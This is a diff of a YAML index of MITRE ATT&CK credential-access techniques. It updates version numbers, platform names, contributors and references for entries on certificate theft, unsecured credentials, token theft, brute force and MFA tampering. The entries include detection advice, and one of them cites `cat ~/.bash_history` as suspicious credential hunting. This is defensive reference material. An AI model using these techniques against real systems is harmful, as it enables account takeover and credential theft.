+        Adversaries may steal or forge certificates used for authentication to access remote systems or resources. Digital certificates are often used to sign and encrypt messages and/or files. Certificates are also used as authentication material. For example, Entra ID device certificates and Active Directory Certificate Services (AD CS) certificates bind to an identity and can be used as credentials for domain accounts.(Citation: O365 Blog Azure AD Device IDs)(Citation: Microsoft AD CS Overview)
 
         Authentication certificates can be both stolen and forged. For example, AD CS certificates can be stolen from encrypted storage (in the Registry or files)(Citation: APT29 Deep Look at Credential Roaming), misplaced certificate files (i.e. [Unsecured Credentials](https://attack.mitre.org/techniques/T1552)), or directly from the Windows certificate store via various crypto APIs.(Citation: SpecterOps Certified Pre Owned)(Citation: GitHub CertStealer)(Citation: GitHub GhostPack Certificates) With appropriate enrollment rights, users and/or machines within a domain can also request and/or manually renew certificates from enterprise certificate authorities (CA). This enrollment process defines various settings and permissions associated with the certificate. Of note, the certificate’s extended key usage (EKU) values define signing, encryption, and authentication use cases, while the certificate’s subject alternative name (SAN) values define the certificate owner’s alternate names.(Citation: Medium Certified Pre Owned)
 
@@ -46146,21 +46906,23 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_contributors:
+      - Tristan Bennett, Seamless Intelligence
+      - Lee Christensen, SpecterOps
+      - Thirumalai Natarajan, Mandiant
+      x_mitre_deprecated: false
       x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       - Linux
       - macOS
-      - Azure AD
-      x_mitre_is_subtechnique: false
-      x_mitre_deprecated: false
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_version: '1.1'
-      x_mitre_contributors:
-      - Tristan Bennett, Seamless Intelligence
-      - Lee Christensen, SpecterOps
-      - Thirumalai Natarajan, Mandiant
+      - Identity Provider
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Application Log: Application Log Content'
@@ -46209,33 +46971,11 @@ credential-access:
         url: https://www.mandiant.com/resources/blog/apt29-windows-credential-roaming
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1649
     atomic_tests: []
   T1552.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--8187bd2a-866f-4457-9009-86b0ddedffa3
-      type: attack-pattern
-      created: '2020-02-04T13:02:11.685Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1552.003
-        url: https://attack.mitre.org/techniques/T1552/003
-      - url: http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way
-        description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
-          DA, the OS X Way. Retrieved July 3, 2017.
-        source_name: External to DA, the OS X Way
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-09-12T15:24:04.912Z'
       name: 'Unsecured Credentials: Bash History'
       description: 'Adversaries may search the bash command history on compromised
         systems for insecurely stored credentials. Bash keeps track of the commands
@@ -46250,25 +46990,43 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_deprecated: false
       x_mitre_detection: Monitoring when the user's <code>.bash_history</code> is
         read can help alert to suspicious activity. While users do typically rely
         on their history of commands, they often access this history through other
         utilities like "history" instead of commands like <code>cat ~/.bash_history</code>.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'File: File Access'
       - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--8187bd2a-866f-4457-9009-86b0ddedffa3
+      created: '2020-02-04T13:02:11.685Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1552/003
+        external_id: T1552.003
+      - source_name: External to DA, the OS X Way
+        description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
+          DA, the OS X Way. Retrieved September 12, 2024.
+        url: https://www.slideshare.net/slideshow/external-to-da-the-os-x-way/62021418
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1552.003
     atomic_tests: []
   T1552.001:
     technique:
-      modified: '2024-04-15T21:33:00.213Z'
+      modified: '2024-10-15T14:28:43.639Z'
       name: 'Unsecured Credentials: Credentials In Files'
       description: |-
         Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.
@@ -46342,7 +47100,6 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1552.001
     atomic_tests: []
   T1606.001:
@@ -46404,11 +47161,10 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1528:
     technique:
-      modified: '2024-03-24T19:41:54.832Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Steal Application Access Token
       description: "Adversaries can steal application access tokens as a means of
         acquiring credentials to access remote systems and resources.\n\nApplication
@@ -46457,6 +47213,7 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Suzy Schapperle - Microsoft Azure Red Team
       - Shailesh Tiwary (Indian Army)
@@ -46465,6 +47222,7 @@ credential-access:
       - Saisha Agrawal, Microsoft Threat Intelligent Center (MSTIC)
       - Ram Pliskin, Microsoft Azure Security Center
       - Jack Burns, HubSpot
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Administrators should set up monitoring to trigger automatic alerts when policy criteria are met. For example, using a Cloud Access Security Broker (CASB), admins can create a “High severity app permissions” policy that generates alerts if apps request high severity permissions or send permissions requests for too many users.
@@ -46475,13 +47233,14 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - SaaS
-      - Office 365
-      - Azure AD
-      - Google Workspace
       - Containers
-      x_mitre_version: '1.3'
+      - IaaS
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Modification'
       - 'User Account: User Account Modification'
@@ -46537,44 +47296,11 @@ credential-access:
         url: https://docs.microsoft.com/en-us/azure/active-directory/develop/active-directory-v2-protocols
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1528
     atomic_tests: []
   T1552.006:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--8d7bd4f5-3a89-4453-9c82-2c8894d5655e
-      type: attack-pattern
-      created: '2020-02-11T18:43:06.253Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1552.006
-        url: https://attack.mitre.org/techniques/T1552/006
-      - source_name: Microsoft GPP 2016
-        url: https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/dn581922(v%3Dws.11)
-        description: Microsoft. (2016, August 31). Group Policy Preferences. Retrieved
-          March 9, 2020.
-      - url: https://msdn.microsoft.com/library/cc422924.aspx
-        description: Microsoft. (n.d.). 2.2.1.1.4 Password Encryption. Retrieved April
-          11, 2018.
-        source_name: Microsoft GPP Key
-      - url: https://obscuresecurity.blogspot.co.uk/2012/05/gpp-password-retrieval-with-powershell.html
-        description: Campbell, C. (2012, May 24). GPP Password Retrieval with PowerShell.
-          Retrieved April 11, 2018.
-        source_name: Obscuresecurity Get-GPPPassword
-      - description: Sean Metcalf. (2015, December 28). Finding Passwords in SYSVOL
-          & Exploiting Group Policy Preferences. Retrieved February 17, 2020.
-        url: https://adsecurity.org/?p=2288
-        source_name: ADSecurity Finding Passwords in SYSVOL
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2024-08-15T13:21:22.734Z'
       name: 'Unsecured Credentials: Group Policy Preferences'
       description: |
         Adversaries may attempt to find unsecured credentials in Group Policy Preferences (GPP). GPP are tools that allow administrators to create domain policies with embedded credentials. These policies allow administrators to set local accounts.(Citation: Microsoft GPP 2016)
@@ -46591,25 +47317,54 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor for attempts to access SYSVOL that involve searching
         for XML files. \n\nDeploy a new XML file with permissions set to Everyone:Deny
         and monitor for Access Denied errors.(Citation: ADSecurity Finding Passwords
         in SYSVOL)"
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Access'
       - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--8d7bd4f5-3a89-4453-9c82-2c8894d5655e
+      created: '2020-02-11T18:43:06.253Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1552/006
+        external_id: T1552.006
+      - source_name: Obscuresecurity Get-GPPPassword
+        description: Campbell, C. (2012, May 24). GPP Password Retrieval with PowerShell.
+          Retrieved April 11, 2018.
+        url: https://obscuresecurity.blogspot.co.uk/2012/05/gpp-password-retrieval-with-powershell.html
+      - source_name: Microsoft GPP 2016
+        description: Microsoft. (2016, August 31). Group Policy Preferences. Retrieved
+          March 9, 2020.
+        url: https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/dn581922(v%3Dws.11)
+      - source_name: Microsoft GPP Key
+        description: Microsoft. (n.d.). 2.2.1.1.4 Password Encryption. Retrieved April
+          11, 2018.
+        url: https://msdn.microsoft.com/library/cc422924.aspx
+      - source_name: ADSecurity Finding Passwords in SYSVOL
+        description: Sean Metcalf. (2015, December 28). Finding Passwords in SYSVOL
+          & Exploiting Group Policy Preferences. Retrieved February 17, 2020.
+        url: https://adsecurity.org/?p=2288
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1552.006
     atomic_tests: []
   T1556.008:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2023-05-04T18:02:51.318Z'
       name: Network Provider DLL
       description: "Adversaries may register malicious network provider dynamic link
         libraries (DLLs) to capture cleartext user credentials during the authentication
@@ -46684,11 +47439,10 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1606:
     technique:
-      modified: '2023-10-15T11:10:03.428Z'
+      modified: '2024-10-15T15:58:23.638Z'
       name: Forge Web Credentials
       description: "Adversaries may forge credential materials that can be used to
         gain access to web applications or Internet services. Web applications and
@@ -46732,11 +47486,10 @@ credential-access:
       - Windows
       - macOS
       - Linux
-      - Azure AD
-      - Office 365
-      - Google Workspace
       - IaaS
-      x_mitre_version: '1.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.5'
       x_mitre_data_sources:
       - 'Web Credential: Web Credential Usage'
       - 'Web Credential: Web Credential Creation'
@@ -46760,8 +47513,8 @@ credential-access:
         url: https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/
       - source_name: GitHub AWS-ADFS-Credential-Generator
         description: Damian Hickey. (2017, January 28). AWS-ADFS-Credential-Generator.
-          Retrieved December 16, 2020.
-        url: https://github.com/damianh/aws-adfs-credential-generator
+          Retrieved September 27, 2024.
+        url: https://github.com/pvanbuijtene/aws-adfs-credential-generator
       - source_name: Microsoft SolarWinds Customer Guidance
         description: MSRC. (2020, December 13). Customer Guidance on Recent Nation-State
           Cyber Attacks. Retrieved December 17, 2020.
@@ -46777,11 +47530,10 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1621:
     technique:
-      modified: '2024-04-19T04:26:29.365Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Multi-Factor Authentication Request Generation
       description: |-
         Adversaries may attempt to bypass multi-factor authentication (MFA) mechanisms and gain access to accounts by generating MFA requests sent to users.
@@ -46792,11 +47544,13 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Jon Sternstein, Stern Security
       - Pawel Partyka, Microsoft 365 Defender
       - Shanief Webb
       - Obsidian Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: 'Monitor user account logs as well as 2FA/MFA application
         logs for suspicious events: unusual login attempt source location, mismatch
@@ -46806,16 +47560,16 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Office 365
       - Linux
       - macOS
       - IaaS
       - SaaS
-      - Azure AD
-      - Google Workspace
-      x_mitre_version: '1.1'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Logon Session: Logon Session Metadata'
@@ -46853,13 +47607,10 @@ credential-access:
         url: https://www.obsidiansecurity.com/blog/behind-the-breach-self-service-password-reset-azure-ad/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1552.008:
     technique:
-      modified: '2023-04-11T00:34:00.779Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Chat Messages
       description: |-
         Adversaries may directly collect unsecured credentials stored or passed through user communication services. Credentials may be sent and stored in user chat communication applications such as email, chat services like Slack or Teams, collaboration tools like Jira or Trello, and any other services that support user communication. Users may share various forms of credentials (such as usernames and passwords, API keys, or authentication tokens) on private or public corporate internal communications channels.
@@ -46868,6 +47619,7 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Douglas Weir
       x_mitre_deprecated: false
@@ -46875,11 +47627,11 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Office 365
       - SaaS
-      - Google Workspace
-      x_mitre_version: '1.0'
+      - Office Suite
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       type: attack-pattern
@@ -46897,13 +47649,10 @@ credential-access:
         url: https://www.nightfall.ai/blog/saas-slack-security-risks-2020
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1212:
     technique:
-      modified: '2023-10-15T11:45:21.555Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Exploitation for Credential Access
       description: |-
         Adversaries may exploit software vulnerabilities in an attempt to collect credentials. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. 
@@ -46916,6 +47665,7 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - John Lambert, Microsoft Threat Intelligence Center
       - Mohit Rathore
@@ -46929,12 +47679,13 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Linux
       - Windows
       - macOS
-      - Azure AD
-      x_mitre_version: '1.5'
+      - Identity Provider
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Process: Process Creation'
@@ -46966,17 +47717,14 @@ credential-access:
         url: https://www.microsoft.com/en-us/security/blog/2023/07/14/analysis-of-storm-0558-techniques-for-unauthorized-email-access/
       - source_name: Microsoft Midnight Blizzard Replay Attack
         description: Microsoft Threat Intelligence. (2023, June 21). Credential Attacks.
-          Retrieved September 27, 2023.
-        url: https://twitter.com/MsftSecIntel/status/1671579359994343425
+          Retrieved September 12, 2024.
+        url: https://x.com/MsftSecIntel/status/1671579359994343425
       - source_name: Technet MS14-068
         description: Microsoft. (2014, November 18). Vulnerability in Kerberos Could
           Allow Elevation of Privilege (3011780). Retrieved December 23, 2015.
         url: https://technet.microsoft.com/en-us/library/security/ms14-068.aspx
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1056.002:
     technique:
@@ -47049,12 +47797,11 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1056.002
     atomic_tests: []
   T1110:
     technique:
-      modified: '2024-01-29T18:53:26.593Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Brute Force
       description: |-
         Adversaries may use brute force techniques to gain access to accounts when passwords are unknown or when password hashes are obtained.(Citation: TrendMicro Pawn Storm Dec 2020) Without knowledge of the password for an account or set of accounts, an adversary may systematically guess the password using a repetitive or iterative mechanism.(Citation: Dragos Crashoverride 2018) Brute forcing passwords can take place via interaction with a service that will check the validity of those credentials or offline against previously acquired credential data, such as password hashes.
@@ -47063,6 +47810,7 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - David Fiser, @anu4is, Trend Micro
       - Alfredo Oliveira, Trend Micro
@@ -47081,18 +47829,18 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '2.5'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.6'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Command: Command Execution'
@@ -47116,13 +47864,10 @@ credential-access:
         url: https://www.dragos.com/wp-content/uploads/CRASHOVERRIDE2018.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1110.004:
     technique:
-      modified: '2024-03-07T14:28:02.910Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Brute Force: Credential Stuffing'
       description: |-
         Adversaries may use credentials obtained from breach dumps of unrelated accounts to gain access to target accounts through credential overlap. Occasionally, large numbers of username and password pairs are dumped online when a website or service is compromised and the user account credentials accessed. The information may be useful to an adversary attempting to compromise accounts by taking advantage of the tendency for users to use the same passwords across personal and business accounts.
@@ -47148,6 +47893,7 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Diogo Fernandes
       - Anastasios Pingios
@@ -47159,18 +47905,18 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '1.5'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'User Account: User Account Authentication'
@@ -47189,14 +47935,11 @@ credential-access:
         url: https://www.us-cert.gov/ncas/alerts/TA18-086A
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1110.004
     atomic_tests: []
   T1556.006:
     technique:
-      modified: '2024-04-16T00:20:21.488Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Multi-Factor Authentication
       description: "Adversaries may disable or modify multi-factor authentication
         (MFA) mechanisms to enable persistent access to compromised accounts.\n\nOnce
@@ -47225,24 +47968,26 @@ credential-access:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Liran Ravich, CardinalOps
       - Muhammad Moiz Arshad, @5T34L7H
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
       - Linux
       - macOS
-      x_mitre_version: '1.2'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Application Log: Application Log Content'
@@ -47277,13 +48022,10 @@ credential-access:
         url: https://docs.microsoft.com/en-us/azure/active-directory/governance/conditional-access-exclusion
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1187:
     technique:
-      modified: '2023-08-14T19:30:45.123Z'
+      modified: '2024-10-15T16:33:34.508Z'
       name: Forced Authentication
       description: |-
         Adversaries may gather credential material by invoking or forcing a user to automatically provide authentication information through a mechanism in which they can intercept.
@@ -47361,14 +48103,13 @@ credential-access:
         url: https://en.wikipedia.org/wiki/Server_Message_Block
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1187
     atomic_tests: []
   T1056:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-08-13T17:33:45.244Z'
       name: Input Capture
       description: Adversaries may use methods of capturing user input to obtain credentials
         or collect information. During normal system usage, users often provide credentials
@@ -47384,6 +48125,7 @@ credential-access:
         phase_name: credential-access
       x_mitre_contributors:
       - John Lambert, Microsoft Threat Intelligence Center
+      x_mitre_deprecated: false
       x_mitre_detection: 'Detection may vary depending on how input is captured but
         may include monitoring for certain Windows API calls (e.g. `SetWindowsHook`,
         `GetKeyState`, and `GetAsyncKeyState`)(Citation: Adventures of a Keystroke),
@@ -47392,13 +48134,13 @@ credential-access:
         keylogging or API hooking are present.'
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Linux
       - macOS
       - Windows
       - Network
-      x_mitre_version: '1.2'
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Process: Process Creation'
@@ -47406,15 +48148,11 @@ credential-access:
       - 'Process: Process Metadata'
       - 'Process: OS API Execution'
       - 'Driver: Driver Load'
-      x_mitre_permissions_required:
-      - Administrator
-      - SYSTEM
-      - root
-      - User
       type: attack-pattern
       id: attack-pattern--bb5a00de-e086-4859-a231-fa793f6797e2
       created: '2017-05-31T21:30:48.323Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1056
@@ -47425,9 +48163,8 @@ credential-access:
         url: http://opensecuritytraining.info/Keylogging_files/The%20Adventures%20of%20a%20Keystroke.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1557.002:
     technique:
@@ -47473,7 +48210,7 @@ credential-access:
         The ARP protocol is stateless and does not require authentication. Therefore, devices may wrongly add or update the MAC address of the IP address in their ARP cache.(Citation: Sans ARP Spoofing Aug 2003)(Citation: Cylance Cleaver)
 
         Adversaries may use ARP cache poisoning as a means to intercept network traffic. This activity may be used to collect and/or relay data such as credentials, especially those sent over an insecure, unencrypted protocol.(Citation: Sans ARP Spoofing Aug 2003)
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-07-22T18:37:22.176Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: ARP Cache Poisoning
       x_mitre_detection: "Monitor network traffic for unusual ARP traffic, gratuitous
@@ -47492,17 +48229,16 @@ credential-access:
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1556.009:
     technique:
-      modified: '2024-04-18T20:53:46.175Z'
+      modified: '2024-09-16T16:54:47.595Z'
       name: Conditional Access Policies
       description: "Adversaries may disable or modify conditional access policies
         to enable persistent access to compromised accounts. Conditional access policies
         are additional verifications used by identity providers and identity and access
         management systems to determine whether a user should be granted access to
-        a resource.\n\nFor example, in Azure AD, Okta, and JumpCloud, users can be
+        a resource.\n\nFor example, in Entra ID, Okta, and JumpCloud, users can be
         denied access to applications based on their IP address, device enrollment
         status, and use of multi-factor authentication.(Citation: Microsoft Conditional
         Access)(Citation: JumpCloud Conditional Access Policies)(Citation: Okta Conditional
@@ -47535,10 +48271,9 @@ credential-access:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Azure AD
-      - SaaS
       - IaaS
-      x_mitre_version: '1.0'
+      - Identity Provider
+      x_mitre_version: '1.1'
